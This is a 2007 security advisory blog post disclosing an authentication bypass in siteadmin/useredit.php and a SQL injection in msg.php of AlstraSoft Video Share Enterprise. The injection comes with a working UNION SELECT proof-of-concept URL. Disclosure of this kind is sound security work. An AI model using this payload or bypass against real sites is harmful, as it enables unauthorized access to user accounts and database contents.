by r0t,der4444,cembo,VietMafia

Thursday, March 29, 2007

AlstraSoft Video Share Enterprise - Information disclosure & SQL injection vuln

discovered by : VietMafia
developer's site:
script: AlstraSoft Video Share Enterprise
risk: medium
status: unpatched

This script has a vuln which can be exploited by malicious people to disclose sensitive information & access to system as administrator.

1.The file siteadmin/useredit.php can be accessed without any authetication. User's info can be viewed & edited after that.



2.SQL injection

after we got access as a registered user there's a sql inj vuln in msg.php file

poc : http://host/path/msg.php?id=-1%20union%20select%201,version(),1,1,1,1,1,1,1

thanks DH for helping me verify this. :)



Post a Comment

<< Home

Copyright (c) 2006 Pridels Sec Crew